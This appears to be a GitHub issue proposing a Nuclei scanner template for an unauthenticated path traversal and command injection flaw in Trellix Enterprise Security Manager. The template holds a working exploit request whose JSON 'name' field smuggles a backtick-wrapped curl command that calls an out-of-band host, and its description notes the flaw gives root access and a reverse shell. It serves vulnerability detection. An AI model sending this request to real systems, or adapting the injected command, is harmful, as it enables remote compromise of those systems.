### ISSUE TITLE
Create Command Injection in Trellix Enterprise Security Manager

### ISSUE THREAD

**Issue by 3th1cyuk1** [projectdiscovery/nuclei-templates#11475]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: trellix-command-injection

info:
  name: trellix command injection
  author: 3th1c_yuk1
  severity: critical
  description: A critical unauthenticated path traversal and command injection vulnerability was identified in Trellix Enterprise Security Manager (ESM) 11.6.10. The ESM's AJP configuration (ProxyPass /rs ajp://localhost:8009/rs) allows unauthorized access to internal API endpoints by exploiting a ..;/ path traversal sequence, bypassing directory restrictions. The /Snowservice/SnowflexAdminServices/ManageNode endpoint is further vulnerable to command injection in the name parameter, allowing remote code execution as root. This vulnerability permits full system compromise via a reverse shell. 
  references: https://hackerone.com/reports/2817658
  
http:
  - raw:
      - |
        POST /rs/..;/Snowservice/SnowflexAdminServices/ManageNode HTTP/1.0
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.59 Safari/537.36
        Content-Length: 186

        {
            "serverName": "test132",
            "processes": [
                {
                    "name": "`curl https://{{interactsh-url}}`", 
                    "signal": "Restart"
                }
            ]
        }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
```

### Relevant dumped responses

```shell

```
